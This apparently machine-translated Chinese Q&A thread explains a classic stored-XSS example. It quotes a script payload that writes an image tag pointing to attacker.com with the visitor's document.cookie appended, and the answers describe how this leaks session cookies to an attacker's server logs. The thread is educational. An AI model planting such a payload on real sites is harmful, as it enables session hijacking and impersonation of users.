引自http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt:
正如许多人可能知道的那样,目前的XSS攻击通常有两种形式: 1 - 攻击者将标签上传到公共暴力委员会,博客或其他网站 有一个XSS漏洞,很多其他用户将访问。攻击者通常 收集站点cookie以供以后用户模仿,但表单提交和其他攻击 有时被利用。这就是我与之交谈过的许多人认为的XSS。 这是一个例子:
有人会在evilblog.com上发布以下其他用户会处理的内容
<script>document.write("<img src=http://attacker.com/” + document.cookie + “>”)</script>
这会尝试使用用户的evilblog从攻击者的服务器上提取图像 网址中的Cookie。
我的问题:
我不明白上面写的图片网址路径的目的/结果。任何人都可以详细说明这个吗?
PS:这意味着什么“这会尝试用URL中的用户的evilblog cookie从攻击者的服务器上取下图像”
答案 0 :(得分:2)
document.write()只是向网站添加了一个img-tag,浏览器会尝试从该网址加载图片。
当脚本和帧来自不同的域时,它们有时会被阻止,因此在这种情况下XSS攻击会失败。通常允许图像,因为许多站点无论如何都会显示来自不同主机的图像,因此XSS攻击将成功。
结果是攻击者日志中包含cookie信息的条目,因为它通常不会返回任何内容,而是将其解释为损坏的图像,因此大多数浏览器不显示任何内容,用户也不会怀疑任何内容。
答案 1 :(得分:1)
目的是浏览器自动检索图像;在示例中,cookie详细信息在该URL的查询字符串中设置,因此攻击者获取URL,获取cookie,从而获取身份验证所需的详细信息。
答案 2 :(得分:1)
简单。它向包含请求URL中的cookie的恶意域发起请求。